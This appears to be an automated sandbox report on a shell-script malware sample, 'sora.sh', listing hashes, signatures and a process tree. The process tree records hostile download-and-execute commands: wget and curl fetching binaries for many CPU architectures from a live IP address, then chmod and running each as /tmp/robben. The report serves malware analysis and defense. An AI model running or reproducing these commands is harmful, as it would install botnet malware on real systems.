Analysis

max time kernel: 4s
max time network: 133s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 29-08-2024 20:35
Static task: static1

Behavioral task: behavioral1
  Sample: sora.sh
  Resource: ubuntu1804-amd64-20240611-en
  2 signatures
  150 seconds

Behavioral task: behavioral2
  Sample: sora.sh
  Resource: debian9-armhf-20240611-en
  4 signatures
  150 seconds

Behavioral task: behavioral3
  Sample: sora.sh
  Resource: debian9-mipsbe-20240729-en
  3 signatures
  150 seconds

Behavioral task: behavioral4
  Sample: sora.sh
  Resource: debian9-mipsel-20240611-en
  3 signatures
  150 seconds
General

Target: sora.sh
Size: 2KB
MD5: 23ce60917752705f59bde8ca8569c3d6
SHA1: 651959b325ca119ccc280a706ef57da197df6dfb
SHA256: c4575e4be3ce1429bf36332d68ad7aa6612852748f0a94067e6936433c26f344
SHA512: 9ce028bb852c3e0b67c66f55cd9b91a2498acccdb80b80220a3a99ca714521de13a1da5c9184ba6732bdb793df98effa7b5a511a5a3f5d30b57de6e88839329b
Score: 7/10
Malware Config
Signatures

Executes dropped EXE (14 IoCs)
  ioc           pid    Process
  /tmp/robben   1496   robben
  /tmp/robben   1505   robben
  /tmp/robben   1511   robben
  /tmp/robben   1517   robben
  /tmp/robben   1523   robben
  /tmp/robben   1537   robben
  /tmp/robben   1543   robben
  /tmp/robben   1549   robben
  /tmp/robben   1555   robben
  /tmp/robben   1561   robben
  /tmp/robben   1567   robben
  /tmp/robben   1573   robben
  /tmp/robben   1579   robben
  /tmp/robben   1585   robben

Writes file to tmp directory (1 IoC)
Malware often drops required files in the /tmp directory.
  description                    ioc           Process
  File opened for modification   /tmp/robben   sora.sh
Processes

Each entry reads: [PID] executable: command line (triggered signature). Indented entries are child processes of /tmp/sora.sh.

[PID 1491] /tmp/sora.sh: /tmp/sora.sh (Writes file to tmp directory)
  [PID 1492] /usr/bin/wget: wget http://188.127.247.15/bins/sora.x86
  [PID 1493] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.x86
  [PID 1494] /bin/cat: cat sora.x86
  [PID 1495] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1496] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1498] /usr/bin/wget: wget http://188.127.247.15/bins/sora.mips
  [PID 1502] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.mips
  [PID 1503] /bin/cat: cat sora.mips
  [PID 1504] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1505] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1507] /usr/bin/wget: wget http://188.127.247.15/bins/sora.x86_64
  [PID 1508] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.x86_64
  [PID 1509] /bin/cat: cat sora.x86_64
  [PID 1510] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1511] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1513] /usr/bin/wget: wget http://188.127.247.15/bins/sora.i468
  [PID 1514] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.i468
  [PID 1515] /bin/cat: cat sora.i468
  [PID 1516] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1517] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1519] /usr/bin/wget: wget http://188.127.247.15/bins/sora.i686
  [PID 1520] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.i686
  [PID 1521] /bin/cat: cat sora.i686
  [PID 1522] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1523] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1525] /usr/bin/wget: wget http://188.127.247.15/bins/sora.mpsl
  [PID 1534] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.mpsl
  [PID 1535] /bin/cat: cat sora.mpsl
  [PID 1536] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1537] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1539] /usr/bin/wget: wget http://188.127.247.15/bins/sora.arm4
  [PID 1540] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.arm4
  [PID 1541] /bin/cat: cat sora.arm4
  [PID 1542] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1543] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1545] /usr/bin/wget: wget http://188.127.247.15/bins/sora.arm5
  [PID 1546] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.arm5
  [PID 1547] /bin/cat: cat sora.arm5
  [PID 1548] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1549] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1551] /usr/bin/wget: wget http://188.127.247.15/bins/sora.arm6
  [PID 1552] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.arm6
  [PID 1553] /bin/cat: cat sora.arm6
  [PID 1554] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1555] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1557] /usr/bin/wget: wget http://188.127.247.15/bins/sora.arm7
  [PID 1558] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.arm7
  [PID 1559] /bin/cat: cat sora.arm7
  [PID 1560] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1561] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1563] /usr/bin/wget: wget http://188.127.247.15/bins/sora.ppc
  [PID 1564] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.ppc
  [PID 1565] /bin/cat: cat sora.ppc
  [PID 1566] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1567] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1569] /usr/bin/wget: wget http://188.127.247.15/bins/sora.ppc440fp
  [PID 1570] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.ppc440fp
  [PID 1571] /bin/cat: cat sora.ppc440fp
  [PID 1572] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1573] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1575] /usr/bin/wget: wget http://188.127.247.15/bins/sora.m68k
  [PID 1576] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.m68k
  [PID 1577] /bin/cat: cat sora.m68k
  [PID 1578] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1579] /tmp/robben: ./robben Payload (Executes dropped EXE)
  [PID 1581] /usr/bin/wget: wget http://188.127.247.15/bins/sora.sh4
  [PID 1582] /usr/bin/curl: curl -O http://188.127.247.15/bins/sora.sh4
  [PID 1583] /bin/cat: cat sora.sh4
  [PID 1584] /bin/chmod: chmod +x config-err-Zq653C netplan_vm7zfz3d robben snap-private-tmp sora.sh ssh-NVlOA3rp5DyP systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-bolt.service-yfWToM systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-colord.service-M2zA4P systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-ModemManager.service-CMtoMD systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-resolved.service-cq0dU2 systemd-private-5386ca9de5824f67bfdd1ec3656acb0b-systemd-timedated.service-sbEysH
  [PID 1585] /tmp/robben: ./robben Payload (Executes dropped EXE)